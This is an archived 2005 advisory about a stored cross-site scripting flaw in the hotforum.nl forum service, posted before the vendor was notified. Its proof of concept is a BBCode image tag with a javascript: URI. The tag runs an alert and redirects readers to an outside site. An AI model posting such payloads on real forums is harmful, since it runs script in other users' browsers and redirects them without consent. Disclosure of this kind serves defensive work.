TUCoPS :: Web BBS :: etc :: hack8590.htm

hotforum.nl XSS exploit
...::: hotforum.nl XSS exploit :::... 





               hotforum.nl XSS exploit
             ---------------------------
              * 13 march 2005
              * Discovered by Qon^Rebyte


..:: STATUS ::..
______________________________________________________________________

hotforum.nl has not yet been notified about this exploit


..:: VULNERABLE ::..
______________________________________________________________________

All hotforums, because it's an on line service.
Once the service is patched all hotforums will be immune.


..:: EXPLOIT ::..
______________________________________________________________________

Risk: Low/Medium
Type: Input Validation Error
What: Input JS code

Proof of Concept
----------------

Post this:

**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/');[/img] 
**********************************************************************

This will alert following message:
"hotforum.nl xss exploit - by Qon^Rebyte"

and redirect to another site:
"http://dhost.info/recall/rebyte/" 


..:: CREDITS ::..
______________________________________________________________________

This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)

 Greetings fly out 2
---------------------
    * Rebyte Security  : because it rox :)
    * Mr.Manson        : Rebyte co-admin
    * Bugtraq          : for doing a great job


         *** Qon ^ Rebyte ***


-- http://dhost.info/recall/rebyte/ -- 
---------- rebyte@walla.com ----------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH